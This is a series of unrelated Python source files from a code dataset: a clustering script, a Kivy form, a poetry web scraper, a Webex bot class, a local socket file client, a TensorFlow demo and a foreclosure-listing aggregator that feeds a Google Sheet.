for j in range(i, k):\n norm = max(sizes[i], sizes[j])\n a = []\n b = []\n for l in range(len(LST[i])):\n a.append(chr(ord('a') + LST[i][l]))\n for l in range(len(LST[j])):\n b.append(chr(ord('a') + LST[j][l]))\n\n # in D[i, j] put edit distance between string i and string j\n D[i, j] = levenshtein(a, b) / float(norm)\n D[j, i] = D[i, j]\n\n######################################################\n# PART 10: Cluster\n# > Create a pairwise distance matrix from the representative\n# unique sequence distance matrix, and use it to create\n# a hierarchical cluster linkage.\n######################################################\n\n# create pairwise distance matrix of distances in D\nXX = eng.squareform(matlab.double(D.tolist()))\n\n# create cluster hierarchy of pairwise clusters\nZ = eng.linkage(XX)\n\ncp = np.zeros(shape=(k), dtype=np.float_)\n\n######################################################\n# PART 11: Correlation, Medioid Selection\n# > Do clustering with cluster counts from 2 to k + 1\n#\n# > Find the optimal cluster count, meaning the\n# cluster count that produces the greatest\n# Spearman/Pearson correlation\n#\n# > Repeat clustering with optimal cluster count\n#\n# > Find medioid of each cluster by creating a matrix\n# of distances between each cluster and finding the\n# sequence which had the summed least distance overall\n# from other sequences in the cluster\n#\n# > Sort each medioid into a quantifier based on its\n# trap similarity metric meeting the threshold of\n# 0.7 for 'almost all', 'most' if not that,\n# and 'many' if not either of those\n######################################################\n\n# do (SL & NERF) spearman and pearson correlations\nfor corr in range(2):\n print('\\n#############################')\n if corr == 0:\n print('Optimal Cluster Count by SL SPEARMAN Correlation')\n elif corr == 1:\n print('Optimal Cluster Count by SL PEARSON Correlation')\n elif corr == 2:\n print('Optimal Cluster Count by NERF SPEARMAN Correlation')\n else:\n print('Optimal Cluster Count by NERF PEARSON Correlation')\n print('#############################')\n\n for i in range(2, k + 1):\n # go down in cluster linkage tree until i clusters are found,\n # clustering all the representative sequences\n cl = eng.cluster(Z, 'maxclust', i)\n\n U = np.zeros(shape=(i, k), dtype=np.float_)\n\n # denote which cluster each of the k representative sequences is in\n # by marking the corresponding index in the row\n # associated with that cluster as 1\n for j in range(k):\n U[int(cl[j][0]) - 1][j] = 1\n\n # format the pairwise distance and cluster membership matrices\n N2 = len(D) * len(D)\n Us = np.transpose(U).dot(U)\n M = np.max(Us)\n Us = 1 - Us / M\n\n # do either spearman or pearson correlation on the pairwise distance\n # and cluster membership matrices\n if corr == 0:\n cp[i - 1] = abs(scipy.stats.spearmanr(np.reshape(D, (N2, 1)), np.reshape(1 - Us / M, (N2, 1)))[0])\n else:\n cp[i - 1] = abs(scipy.stats.pearsonr(np.reshape(D, (N2, 1)), np.reshape(1 - Us / M, (N2, 1)))[0])\n\n # get number of clusters which created the greatest correlation\n # (i.e. get the index i with the greatest correlation that corresponds\n # to the clustering with i clusters)\n c = int(cp.argmax(axis=0)) + 1\n\n listSL = []\n for row in range(c):\n listSL += [[0] * 3]\n\n # cluster with the greatest correlation number of clusters\n cl = eng.cluster(Z, 'maxclust', c)\n cl = [int(e[0]) - 1 for e in cl]\n\n print(cl)\n\n for i in range(c):\n # get the least distances matrices of the sequences in each cluster\n STi = [];\n for j in range(len(cl)):\n if cl[j] == i:\n STi.append(ST[j])\n\n # get the representative sequences for each cluster\n LSTi = [];\n for j in range(len(cl)):\n if cl[j] == i:\n LSTi.append(LST[j])\n\n # get the number of sequences in each cluster\n sum = 0\n for j in range(len(cl)):\n if cl[j] == i:\n sum += 1\n\n Di = np.zeros(shape=(sum, sum), dtype=np.float_)\n\n # make a matrix of distances between all sequences in\n # the current cluster (matrix is a one element matrix\n # containing 0 if only one sequence is in the cluster)\n row = 0\n for j in range(len(cl)):\n if cl[j] == i:\n col = 0\n for l in range(len(cl)):\n if cl[l] == i:\n Di[row][col] = D[j][l]\n col += 1\n row += 1\n\n # get index of min column sum\n # (i.e. sequence for which total distance sum was least,\n # the medioid)\n ix = np.argmin(Di.sum(axis=0))\n\n # store the medioid\n listSL[i][1] = LSTi[ix]\n\n # store trap similarity metric of each sequence in this cluster\n ti = [];\n for j in range(len(cl)):\n if cl[j] == i:\n ti.append(tp3[j])\n\n # get trap similarity metric of the medioid\n ti = ti[ix]\n\n # sort the medioid sequence into a quantifier\n # ('many', 'most', 'almost all')\n # and store the trap similarity metric of the\n # medioid\n if ti[2] >= 0.7:\n listSL[i][0] = quant[2][0]\n listSL[i][2] = ti[2]\n elif ti[1] >= 0.7:\n listSL[i][0] = quant[1][0]\n listSL[i][2] = ti[1]\n elif ti[0] >= 0.7:\n listSL[i][0] = quant[0][0]\n listSL[i][2] = ti[0]\n\n######################################################\n# PART 12: Output\n# > Print each medioid and its quantifier\n#\n# > Prune medioids that are contained within other\n# medioids\n#\n# > Print each remaining medioid (the contents\n# of the medioid) and its quantifier\n######################################################\n\n m = c\n\n # for each cluster, print quantifier of that cluster's medioid\n # (i.e. most [sequences] are like 1 5 2 . . .)\n for i in range(m):\n print(str(listSL[i][0]), 'are like', listSL[i][1])\n\n print('after pruning')\n\n for i in range(m - 1):\n for j in range(i + 1, m):\n # if the quantifiers of two medioids are the same\n if listSL[i][0] == listSL[i][1]:\n pat_a = chr(ord('a') + LST[j][1])\n pat_b = chr(ord('a') + LST[i][1])\n\n # if medioid i is contained within medioid j,\n # set the trap similarity of medioid i to 0\n sub_str = pat_a.find(pat_b)\n if sub_str > 0:\n listSL[i][2] = 0\n\n # get array of trap similarity metrics of medioids\n list1 = []\n for i in range(len(listSL)):\n list1.append(listSL[i][2])\n\n # prune all medioids with trap similarity metric 0\n # (i.e. medioids that are contained within other medioids)\n listSL_new = []\n for i in range(len(list1)):\n if list1[i] > 0:\n listSL_new.append(listSL[i])\n\n listSL = listSL_new\n\n # get number of remaining totally unique medioids\n m = len(listSL)\n\n # print quantifer and medioid (actual contents of medioid,\n # not just symbolic abbreviation)\n # (i.e. most cases contain sequences like {\n # Register\n # Appeal\n # Archive\n # })\n for i in range(m):\n print(listSL[i][0], 'cases contain sequence like {')\n list_len = len(listSL[i][1])\n for j in range(list_len):\n print('\\t', ids[1][listSL[i][1][j]])\n print('}')\n\n # store lists of medioids\n if corr == 0:\n listSL1 = listSL\n else:\n listSL2 = listSL\n\nexit()\n\n#################################################\n# SL Pearson\n\n# D_new = []\n# for i in range(len(D)):\n# D_row = [float(e) for e in D[i]]\n# D_new.append(D_row)\n\nk = len(LST)\nmm = 1.5\n\nprint(U)\nU = matlab.double(U.tolist())\n\nfor i in range(2, k + 1):\n # D = matlab.double(D)\n\n print(len(U), len(U[0]))\n U = eng.nerfcm(U, i, mm, 0.0001)\n","sub_path":"summarization.py","file_name":"summarization.py","file_ext":"py","file_size_in_byte":41760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"153890209","text":"import kivy\nkivy.require('1.9.0')\n\nfrom kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.label import Label\nfrom kivy.uix.button import Button\n\nclass Caja1 (GridLayout):\n def __init__(self,**kwargs):\n super(Caja1, self).__init__(**kwargs)\n\n self.cols = 1\n\n self.inside = GridLayout()\n self.inside.cols = 2\n\n self.inside.add_widget(Label(text=\"Name: \"))\n self.name = TextInput(multiline=False)\n self.inside.add_widget(self.name)\n\n self.inside.add_widget(Label(text=\"Last Name: \"))\n self.lastName = TextInput(multiline=False)\n self.inside.add_widget(self.lastName)\n\n self.inside.add_widget(Label(text=\"Email: \"))\n self.email = TextInput(multiline=False)\n self.inside.add_widget(self.email)\n\n self.add_widget(self.inside)\n\n self.enviar = Button(text=\"Enviar\")\n self.enviar.bind(on_press=self.pressed)\n self.add_widget(self.enviar)\n\n def pressed(self, instance):\n name = self.name.text\n last = self.lastName.text\n mail = self.email.text\n\n print(name, last, mail)\n\nclass MainApp(App):\n title = \"Falsito truco\"\n def build(self):\n return Caja1()\n\nif __name__ == '__main__':\n MainApp().run()","sub_path":"KIVY/src/techtim.py","file_name":"techtim.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"302620770","text":"import requests\nimport datetime\nfrom bs4 import BeautifulSoup\nimport csv\nimport multiprocessing\nimport time\n\n\nBAD_THRESHHOLD = 1000\n\n\ndef load_bookmark():\n with open('bookmark.txt', 'r') as f:\n bookmark = f.read()\n bookmark_splited = bookmark.split('/')\n\n bookmark_year = int(bookmark_splited[-4])\n bookmark_month = int(bookmark_splited[-3])\n bookmark_day = int(bookmark_splited[-2])\n bookmark_poem_number = int(bookmark_splited[-1])\n\n page_dict = {\n 'year': bookmark_year,\n 'month': bookmark_month,\n 'day': bookmark_day,\n 'number': bookmark_poem_number,\n }\n return page_dict\n\n\ndef page_dict_to_url(page_dict):\n url = f\"https://stihi.ru/{page_dict['year']}/{page_dict['month']:02}/{page_dict['day']:02}/{page_dict['number']}\"\n return url\n\n\ndef flip_page(page_dict, count=1):\n if page_dict['number'] <= count:\n this_date = datetime.date(\n page_dict['year'], page_dict['month'], page_dict['day'])\n new_date = this_date - datetime.timedelta(1)\n\n page_dict['year'] = new_date.year\n page_dict['month'] = new_date.month\n page_dict['day'] = new_date.day\n page_dict['number'] = 5000\n\n else:\n page_dict['number'] -= count\n\n return page_dict\n\n\ndef main():\n current_page = load_bookmark()\n\n bad_status_in_a_row_count = 0\n while bad_status_in_a_row_count < BAD_THRESHHOLD:\n\n url = page_dict_to_url(current_page)\n with open('bookmark.txt', 'w') as f:\n f.write(url)\n\n try:\n response = requests.get(url)\n status_code = response.status_code\n except:\n print(f'{url} | Connection error!')\n status_code = 0\n\n if status_code != 200:\n bad_status_in_a_row_count += 1\n print('Status code not 200. Initiating evasive maneuver')\n current_page = flip_page(current_page, count=1000)\n\n else:\n bad_status_in_a_row_count = 0\n\n soup = BeautifulSoup(response.text, 'html.parser')\n poem = soup.find('div', {'class': 'text'})\n if poem is None:\n current_page = flip_page(current_page, count=100)\n print(f'{url} | skipped')\n continue\n poem = poem.text.strip()\n poem = poem.replace('\\n', '|').replace('\\xa0', '')\n\n with open('poems.csv', 'a', encoding='utf-8') as f:\n writer = csv.writer(f)\n writer.writerow([poem])\n\n current_page = flip_page(current_page)\n print(f'{url} | ok')\n\n else:\n print('Finished or stuck, go check something')\n return 0\n\n\nif __name__ == '__main__':\n\n with open('bookmark.txt', 'r') as f:\n bookmark_before = f.read()\n\n p = multiprocessing.Process(target=main)\n p.start()\n\n while True:\n time.sleep(10)\n with open('bookmark.txt', 'r') as f:\n bookmark_after = f.read()\n\n if bookmark_before == bookmark_after and p.is_alive():\n p.kill()\n p.join(5)\n p = multiprocessing.Process(target=main)\n p.start()\n print('RESTARTING PROCESS')\n elif p.is_alive():\n bookmark_before = bookmark_after\n","sub_path":"parser/poetry_scrapper.py","file_name":"poetry_scrapper.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"362594589","text":"from python_webex.v1.People import People\nfrom python_webex.v1.Room import Room\nfrom python_webex.v1.Webhook import Webhook\nfrom python_webex.v1.Message import Message\n\nimport os\nimport sys\n\n\nclass Bot(People, Room, Webhook, Message):\n\n def __init__(self):\n\n # declare headers and how the token will be gotten from the system\n self.URL = \"https://api.ciscospark.com/\"\n self.auth_token = os.getenv(\"auth_token\")\n\n if self.auth_token == None:\n sys.exit(\"'auth_token' not set in the environment variables\")\n \n self.headers = {\n \"Authorization\": \"Bearer \" + self.auth_token,\n \"Content-Type\": \"application/json\"\n }\n \n # self.hears to function maps when a specific word is heard to a function\n # for example, when one says 'hi' and you want to map it to say_hi() function\n self.hears_to_function = {\n\n }\n self.attach_function = None\n\n \"\"\"\n decorator meant to do a specific action when called\n \"\"\"\n def on_hears(self, message_text):\n def hear_decorator(f):\n self.hears_to_function[message_text] = f\n\n return hear_decorator\n\n","sub_path":"python_webex/v1/Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"371004490","text":"import socket # Import socket module\nimport os\n\nfilelist = str() # Create a socket object\nhost = socket.gethostname() # Get local machine name\nport = 6008 # Reserve a port for your service.\n\n\n\n\n\nfor root,d_names,f_names in os.walk('./cl'):\n\n for i in f_names:\n\n g = open(\"./cl/\"+i)\n print(i)\n contents = str()\n contents = i + \"|\" + g.read()\n \n s = socket.socket()\n \n s.connect((host, port))\n \n s.send(contents.encode())\n\n with open('./cl/received_file', 'wb') as f:\n\n while True:\n\n print('receiving data...')\n data = s.recv(10000)\n if not data:\n break\n f.write(data)\n s.close()\n g.close()\n f.close()\n\nf=open(\"./cl/received_file\", \"r\")\n\nif f.mode == 'r':\n contents = f.read()\n\nif(len(contents)!=0):\n pass\nelse:\n print(\"No changes, safe to commit\")\n\nf.close()\n\nprint('Successfully get the file')\ns.close()\nprint('connection closed')","sub_path":"client-diff.py","file_name":"client-diff.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"10358289","text":"import tensorflow as tf\nimport numpy as np\nfrom datetime import datetime\nfrom pathlib import Path\n\nif __name__ == '__main__':\n root_log_path = Path('.') / 'tf_logs' / f'run-{datetime.utcnow().strftime(\"%Y%m%d%H%M%S\")}'\n tf_x = tf.Variable(initial_value=-10.0, name='x')\n with tf.name_scope('fct'):\n # tf_y = 2 * tf.square(tf_x) - 5 * tf_x + 1\n tf_y = tf.add(tf.subtract(tf.multiply(tf.constant(2.0, name='2'), tf.square(tf_x)),\n tf.multiply(tf.constant(5.0, name='5'), tf_x)), tf.constant(1.0, name='1'))\n tf_y_write = tf.Print(tf_y, [tf_x, tf_y])\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1)\n tf_training = optimizer.minimize(tf_y, var_list=(tf_x,))\n tf_y_summary = tf.summary.scalar('y', tf_y)\n with tf.summary.FileWriter(str(root_log_path), tf.get_default_graph()) as f:\n with tf.Session() as session:\n session.run(tf_x.initializer)\n for epoch in range(100):\n session.run([tf_training, tf_y_write])\n if epoch % 8 == 0:\n y_summary = tf_y_summary.eval()\n f.add_summary(y_summary, epoch)\n print(tf_x.eval(), tf_y.eval())\n","sub_path":"tf_fct_min.py","file_name":"tf_fct_min.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"297090741","text":"import os\nimport pdb\nimport json\nimport numpy as np\nimport sys\nimport re\nimport shutil\nimport pandas as pd\nimport subprocess\nimport glob\nimport os\nimport datetime\nfrom pytz import timezone\nfrom collections import Counter\nfrom df2google import DF2GoogleSpreadSheet\nfrom utils import (setup_logging,\n load_json,\n dump_json,\n load_json_or_create_if_empty)\nfrom excel_formulas import formulas_dict\n\npd.options.mode.chained_assignment = None\nwork_directory = os.path.dirname(os.path.abspath(__file__))\nlogfile = os.path.join(work_directory, 'logs', 'scraper_log.log')\nlogger = setup_logging(logfile)\n\nCWD = os.path.split(os.path.abspath(__file__))[0]\ndatabase_path = os.path.join(CWD, 'database')\ncsv_path = os.path.join(CWD, 'csv')\ntz = timezone('EST')\ndatetime_today = datetime.datetime.now(tz)\ntoday = datetime_today.strftime('%d_%m_%Y')\ntoday_time = datetime_today.strftime('%m-%d-%Y %H:%M')\n\nlogger.info(\"\\n{}<{}>{}\".format('*' * 25, today_time, '*' * 25))\n# sheet_name = datetime.datetime.now().strftime('Sheet_%m_%Y')\nsheet_name = 'Current'\nspread_sheet_id = '1kZvZn__U62ZMytci3je8cZ-TLNmRtdtuFI0avzqK75c' # '1uMa11jIIYyKMj2o73fgdHzYI5IUNdPzZzu_pocwoUx0'\nresult_file_path = os.path.join(CWD, 'result', 'final_result.csv')\nis_test_env = os.path.exists(os.path.join(CWD, '.test'))\nif is_test_env or sys.platform.startswith('win'):\n spread_sheet_id = '1uMa11jIIYyKMj2o73fgdHzYI5IUNdPzZzu_pocwoUx0'\n spread_sheet_id = '1kZvZn__U62ZMytci3je8cZ-TLNmRtdtuFI0avzqK75c'\n python_interpreter = sys.executable\nelse:\n python_interpreter = '/home/ec2-user/anaconda3/bin/python'\ncurrent_directory = os.path.split(os.path.realpath(__file__))[0]\nshapiro_file = os.path.join(current_directory, 'shapiro.py')\nbrockandscott_file = os.path.join(current_directory, 'brockandscott.py')\nhutchenslawfirm_file = os.path.join(current_directory, 'hutchenslawfirm.py')\n\nHOME_DIRECTORY = os.path.expanduser('~')\n\n# result_file_path = os.path.join('result', 'final_result.xlsx')\nboa_url = \"https://realestatecenter.bankofamerica.com/tools/marketvalue4.aspx?address=\"\nzillow_url = \"https://www.zillow.com/homes/\"\nmaps_url = \"https://www.google.com/maps/place/\"\nboa_substitute = lambda x: boa_url + str(x).replace(',', '').replace(' ', '+')\n\nzillow_substitute = lambda x: zillow_url + str(x).replace(',', '').replace(' ', '_') + '_rb'\n\nmap_substitute = lambda x: maps_url + str(x).replace(',', '').replace(' ', '+')\n\nremove_extra_spaces = lambda x: re.sub('\\s+', ' ', str(x))\n\n\ndef remove_dir(csv_path):\n if os.path.exists(csv_path):\n shutil.rmtree(csv_path)\n\n\ndef copy_gdrive_private_file():\n drive_private = os.path.join(HOME_DIRECTORY, '.gdrive_private')\n if not os.path.exists(drive_private):\n src = os.path.join('private', '.gdrive_private')\n dst = drive_private\n shutil.copy(src, dst)\n logger.info(\"gdrive_private file placed in HOME directory\")\n\n\ndef update_dfs(initial_df, updated_df, key):\n # initial_df = initial_df.sort_values('Source').reset_index().groupby('Num', group_keys=False).last()\n # updated_df = updated_df.sort_values('Source').reset_index().groupby('Num', group_keys=False).last()\n initial_df = initial_df.set_index(key)\n updated_df = updated_df.set_index(key)\n\n initial_df.update(updated_df) # ERROR\n initial_df.reset_index(inplace=True)\n initial_df['Updated Date'] = today_time\n return initial_df\n\n\ndef parse_bid_date(date):\n try:\n return ' '.join(re.compile('(\\d+?/\\d+?/\\d+?)[\\s-]*(\\d+?:\\d{2}).*').search(date).groups())\n except:\n return ' '.join(re.compile('(\\d+?/\\d+?/\\d+)[\\s-]*').search(date).groups())\n\n\ndef execute_scraping_script(scriptname, county=None, state=None, sales_type=None):\n cmd_args = [python_interpreter, scriptname]\n if county:\n cmd_args.append(county)\n if state:\n cmd_args.append(state)\n if sales_type:\n cmd_args.append(sales_type)\n\n cmd = ' '.join(cmd_args)\n logger.info(\"Executing `{}`\".format(cmd))\n subprocess.call(cmd, shell=True)\n\n\ndef execute_scripts():\n counties = ['Mecklenburg', 'Cabarrus', 'Union', 'Iredell']\n\n for county in counties:\n # SHAPIRO\n execute_scraping_script(shapiro_file, county=county, state='NC', sales_type='upcoming_sales')\n\n # SHAPIRO (SALES_HELD)\n execute_scraping_script(shapiro_file, county=county, state='NC', sales_type='sales_held')\n\n # BROCKANDSCOTT\n execute_scraping_script(brockandscott_file, county=county, state='NC')\n\n # HUTCHENSLAWFIRM\n execute_scraping_script(hutchenslawfirm_file, county=county)\n\n\ndef prepare_new_records_for_concatenation(init_df, current_run_data_df):\n init_df['Num'] = init_df['Num'].str.replace(' ', '')\n logger.info(\"Found data from SpreadSheet with {} records\".format(len(init_df)))\n if 'Flag' not in init_df.columns:\n init_df['Flag'] = \"No\"\n intersection_records = set(current_run_data_df['Num']).intersection(set(init_df['Num']))\n new_records = set(current_run_data_df['Num']) - set(init_df['Num'])\n set_flag = lambda x: 'Yes' if x['Num'] in intersection_records or \\\n x['Num'] in new_records else \"No\" # x['Flag']\n\n # ------------------------------------------\n # SETUP NEW RECORDS DF\n # ------------------------------------------\n new_records_df = current_run_data_df[current_run_data_df['Num'].isin(new_records)]\n # ADD EXTRA COLUMNS\n new_records_df['Inserted Date'] = today_time\n new_records_df['Updated Date'] = today_time\n # result_df = result_df[final_columns].fillna('NA')\n # new_records_df['Group'] = ''\n # new_records_df['Rating'] = ''\n new_records_df['BoA'] = new_records_df['Address'].apply(boa_substitute)\n new_records_df['Zillow'] = new_records_df['Address'].apply(zillow_substitute)\n new_records_df['Location'] = new_records_df['Address'].apply(map_substitute)\n new_records_df[\"Flag\"] = \"Yes\"\n\n # Add empty values to missing columns\n missing_columns_from_result_df = set(init_df.columns) - set(new_records_df.columns)\n for col in missing_columns_from_result_df:\n new_records_df[col] = ''\n\n # UPDATING INITIAL DF with updated data\n try:\n init_df = update_dfs(init_df, current_run_data_df, 'Num')\n except Exception as e:\n raise Exception(\"Unable to update exisiting data with curretn run data. Error:{}\".format(e))\n\n result_df = pd.concat([init_df, new_records_df])\n result_df['Flag'] = result_df.apply(set_flag, axis=1)\n return result_df\n\n\ndef reformat_shapiro_salesheld(shapiro_salesheld_dfs):\n if not shapiro_salesheld_dfs:\n return pd.DataFrame()\n shapiro_salesheld = pd.concat(shapiro_salesheld_dfs)\n shapiro_salesheld.fillna(\"\", inplace=True)\n shapiro_salesheld = shapiro_salesheld[shapiro_salesheld['Property County'] != 'NO MATCHES FOUND']\n # split Property County to two different columns\n shapiro_salesheld['county'], shapiro_salesheld['State'] = shapiro_salesheld['Property County'].str.split(', ').str\n shapiro_salesheld['Source'] = 'shapiro-salesheld'\n shapiro_salesheld['Upset Info'] = shapiro_salesheld['Last Upset'] + ';' + shapiro_salesheld['Sucessful Bidder']\n\n # rename columns\n columns_rename_shapiro = {'Case #': 'Num',\n 'High Bid': 'Price',\n 'Property Address': 'Address',\n 'Sale Date': 'Bid Date',\n }\n shapiro_salesheld.rename(columns=columns_rename_shapiro, inplace=True)\n shapiro_salesheld['Num'] = shapiro_salesheld['Num'].str.replace(' ', '')\n return shapiro_salesheld\n\n\ndef reformat_shapiro(shapiro_dfs):\n if not shapiro_dfs:\n return pd.DataFrame()\n shapiro = pd.concat(shapiro_dfs)\n shapiro.fillna(\"\", inplace=True)\n shapiro = shapiro[shapiro['Property County'] != 'NO MATCHES FOUND']\n # split Property County to two different columns\n shapiro['county'], shapiro['State'] = shapiro['Property County'].str.split(', ').str\n shapiro['Source'] = 'shapiro'\n # rename columns\n columns_rename_shapiro = {'Case #': 'Num',\n 'Open Bid': 'Price',\n 'Property Address': 'Address',\n 'Sale Date - Sale Time': 'Bid Date'}\n shapiro.rename(columns=columns_rename_shapiro, inplace=True)\n shapiro['Num'] = shapiro['Num'].str.replace(' ', '')\n return shapiro\n\n\ndef reformat_brockandscott(brockandscott_dfs):\n if not brockandscott_dfs:\n return pd.DataFrame()\n brockandscott = pd.concat(brockandscott_dfs)\n brockandscott.fillna(\"\", inplace=True)\n # remove extra spaces from Address\n brockandscott['Address'] = brockandscott['Address'].apply(remove_extra_spaces)\n brockandscott['Source'] = 'brockandscott'\n # rename columns\n columns_rename = {'Bid Amount': 'Price',\n 'Book Page': 'Misc-1',\n 'Case Number': 'Parcel Nu',\n 'County': 'county',\n 'Court SP#': 'Num',\n 'Sale Date & Time': 'Bid Date',\n 'State Code': 'State'}\n # after change of URL\n columns_rename = {'Opening Bid Amount': 'Price',\n 'Book Page': 'Misc-1',\n 'Case #': 'Parcel Nu',\n 'County': 'county',\n 'Court SP #': 'Num',\n 'Sale Date': 'Bid Date'}\n\n brockandscott.rename(columns=columns_rename, inplace=True)\n brockandscott['Num'] = brockandscott['Num'].str.replace(' ', '')\n return brockandscott\n\n\n# TODO: remove `No records to display` records\ndef reformat_hutchenslawfirm(hutchenslawfirm_dfs):\n if not hutchenslawfirm_dfs:\n return pd.DataFrame()\n # Formatting Hutchenslawfirm\n hutchenslawfirm = pd.concat(hutchenslawfirm_dfs)\n hutchenslawfirm.fillna(\"\", inplace=True)\n hutchenslawfirm['Source'] = 'hutchens'\n hutchenslawfirm['county'], hutchenslawfirm['State'] = hutchenslawfirm['County'].str.split(', ').str\n columns_rename = {'SP#': 'Num',\n # 'County': 'county',\n 'Sale Date': 'Bid Date',\n 'Deed of Trust Book/Page': 'Misc-1',\n 'Bid Amount': 'Price'}\n hutchenslawfirm['Address'] = hutchenslawfirm['Property Address'] + ' ' + hutchenslawfirm['Property CSZ']\n hutchenslawfirm.rename(columns=columns_rename, inplace=True)\n hutchenslawfirm['Num'] = hutchenslawfirm['Num'].str.replace(' ', '')\n return hutchenslawfirm\n\n\ndef drop_duplicates_nd_preserve_rest(df, key):\n '''\n to rename key with number of occurence in case of duplicate key having multiple values\n Eg:\n col1 col2 col3\n 1 ABC pra nav\n 2 BDE ran dom\n 3 ABC das ari **\n ->cosidering col1 as key: value in row 3 (ABC) is duplicate, but has different values for rest of the columns\n so we replace ABC with ABC_1\n :return: dataframe without duplicates\n '''\n # REMOVE DUPLICATE ROWS\n df = df.drop_duplicates()\n\n count_series = df.groupby(key).cumcount()\n count_series = count_series.replace(0, '').replace(1, '_1').astype(str)\n df[key] += count_series\n return df\n\n\ndef init_rent_dict_for_missing_address(address_series):\n rent_json_file = os.path.join(database_path, 'rent.json')\n rent_dict = load_json_or_create_if_empty(rent_json_file)\n for address in address_series:\n if address not in rent_dict:\n rent_dict[address] = {}\n dump_json(rent_json_file, rent_dict)\n return rent_dict\n\n\ndef set_rent_attributes(rent_dict, row_series, rent_attr):\n address = row_series['Address']\n error_field = 'Error'\n attr_value = row_series.get(rent_attr)\n if (not attr_value or attr_value is np.nan):\n attrs_from_json = rent_dict.get(address, {})\n error = attrs_from_json.get(error_field)\n if error:\n attr_value = 0 # \"Error: {}\".format(error)\n else:\n attr_value = attrs_from_json.get(rent_attr, '')\n\n return attr_value\n\n\ndef rent_attrs_series(rent_dict, row_series, rent_attrs):\n return pd.Series([set_rent_attributes(rent_dict, row_series, attr)\n for attr in rent_attrs])\n\n\ndef apply_excel_formula(df, formula):\n return df.apply(lambda x: formula.format(x.name + 1), axis=1)\n\n\ndef extract_dolar_value(string):\n match_obj = re.match(\".*?(\\$.*)\", string)\n if match_obj:\n return match_obj.group(1)\n return ''\n\n\n# TODO: DELETE `NO MATCHES FOUND` records\ndef main():\n # // execute all scraping sites and store in csv folder\n execute_scripts()\n\n # // if gdrive creds file is not present in home directory, copy it\n copy_gdrive_private_file()\n\n # // get all files list of those which were stored by executing scraping sites\n result_files = glob.glob(os.path.join(csv_path, '*'))\n result_files = [i for i in result_files if re.search('_' + today, i)]\n if not result_files:\n raise Exception(\"No Files found for {}\".format(today))\n res = dict()\n\n # // read all files and store them as dataframes\n for result in result_files:\n variable = os.path.splitext(os.path.basename(result))[0]\n try:\n res[variable] = pd.read_csv(result)\n except UnicodeDecodeError:\n res[variable] = pd.read_csv(result, encoding=\"ISO-8859-1\")\n except:\n pass\n\n # OBTAIN shapiro related files into one df and brockandscott into one\n brockandscott_dfs = []\n shapiro_dfs = []\n shapiro_salesheld_dfs = []\n\n hutchenslawfirm_dfs = []\n for filename, result_df in res.items():\n if filename.startswith('brockandscott'):\n brockandscott_dfs.append(result_df)\n elif filename.startswith('shapiro-salesheld'):\n shapiro_salesheld_dfs.append(result_df)\n elif filename.startswith('shapiro'):\n shapiro_dfs.append(result_df)\n elif filename.startswith('hutchenslawfirm'):\n hutchenslawfirm_dfs.append(result_df)\n\n # ------------------------------------------------------\n # Formatting brockandscott\n # ------------------------------------------------------\n brockandscott = reformat_brockandscott(brockandscott_dfs)\n\n # ------------------------------------------------------\n # Formatting Shapiro\n # ------------------------------------------------------\n shapiro = reformat_shapiro(shapiro_dfs)\n shapiro_salesheld = reformat_shapiro_salesheld(shapiro_salesheld_dfs)\n\n # ------------------------------------------------------\n # Formatting Hutchenslawfirm\n # ------------------------------------------------------\n hutchenslawfirm = reformat_hutchenslawfirm(hutchenslawfirm_dfs)\n\n # ------------------------------------------------------\n # INTERMEDIATE FILE TO CSV\n # ------------------------------------------------------\n # brockandscott.to_csv(os.path.join('result','brockandscott.csv'))\n # shapiro.to_csv(os.path.join('result', 'shapiro.csv'))\n\n # ------------------------------------------------------\n # Concat Brockandscot and Shapiro current execution result\n # ------------------------------------------------------\n current_run_data_df = pd.concat([brockandscott, shapiro, shapiro_salesheld, hutchenslawfirm])\n current_run_data_df.fillna(\"\", inplace=True)\n preserve_columns_order = ['county', 'Bid Date', 'BidDate_Formatted',\n 'Price',\n 'State', 'Num', 'Parcel Nu',\n 'Address', 'Misc-1', 'Source',\n 'Group', 'Rating', 'BoA',\n 'Zillow', 'Location', 'Inserted Date',\n 'Updated Date', 'Flag'\n ]\n\n # ------------------------------------------------------\n # DOWNLOAD EXISTING SPREADSHEET DATA\n # ------------------------------------------------------\n logger.info(\"Trying to read data from GoogleSpreadSheet:{} sheet: {}\".format(spread_sheet_id, sheet_name))\n try:\n df2google = DF2GoogleSpreadSheet(spreadsheet=spread_sheet_id, sheetname=sheet_name)\n init_df = df2google.download()\n except Exception as e:\n raise Exception(\"Unable to download spreadsheet: {}\".format(e))\n\n # ------------------------------------------------------\n # If No data from Google spreadsheet, create empty dataframe\n # ------------------------------------------------------\n if init_df is None:\n init_df = pd.DataFrame(columns=preserve_columns_order)\n logger and logger.error(\"No data obtained from Google spreadsheet\")\n\n # ------------------------------------------------------\n # Move existing data to new sheet if new month starts\n # ------------------------------------------------------\n if datetime_today.day == 1 and datetime_today.hour < 1:\n new_sheet_name = 'Sheet_{}_{}'.format(datetime_today.month - 1, datetime_today.year)\n logger.info(\n \"New Month Started, moving existing data to new Sheet:{} and emptying existing data\".format(new_sheet_name))\n df2google.upload(init_df, new_sheet_name)\n init_df = pd.DataFrame(columns=preserve_columns_order)\n\n # ------------------------------------------------------\n # Drop duplciated from current df and init df\n # ------------------------------------------------------\n init_df = drop_duplicates_nd_preserve_rest(init_df, key='Num')\n current_run_data_df = drop_duplicates_nd_preserve_rest(current_run_data_df, key='Num')\n\n current_run_data_df.drop_duplicates(inplace=True)\n # ------------------------------------------------------\n # Concatenate New Data and Existing Data\n # 